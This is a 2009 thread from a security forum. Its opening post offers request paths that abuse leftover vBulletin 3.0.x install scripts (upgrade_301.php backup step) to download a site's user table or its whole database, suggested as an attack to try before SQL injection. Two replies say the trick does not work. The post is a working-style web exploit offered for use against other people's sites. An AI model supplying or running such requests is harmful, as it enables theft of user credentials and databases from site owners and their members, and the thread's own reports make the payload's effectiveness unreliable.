 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 78
 Members: 0
 Total: 78
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
VB Database Download Exploit |
|
 Posted: Mon Apr 06, 2009 1:23 am |
 |
|
| koosta |
| Regular user |
 |
|
| Joined: Apr 04, 2009 |
| Posts: 6 |
|
|
|
 |
|
 |
|
I've seen this posted here before, but I figured I'd post it again since I couldn't seem to find it. This works on pirated versions of VB since most of the time the administrator isn't slick enough to remove the install files. I'd try this before you use any SQL injections or break your back trying to find a good perl exploit.
*****.com/install/upgrade_301.php?step=backup&do=sqltable&table=vb_user
That will download the user table ^
******.com/install/upgrade_301.php?step=backup&do=sqltable
That will download the entire database ^
Works on almost any vb 3.0.x that is pirated, which most are. Cheers |
|
|
|
|
| Posted: Mon Apr 06, 2009 5:31 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
|
doesnt work |
|
| Posted: Thu Apr 30, 2009 5:29 pm |
|
|
| access101 |
| Regular user |
 |
|
| Joined: Apr 29, 2009 |
| Posts: 21 |
|
|
|
|
|
|
|
| i try these links on various forms running 3.0.x and it doesnt work |
|
|
|
|
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
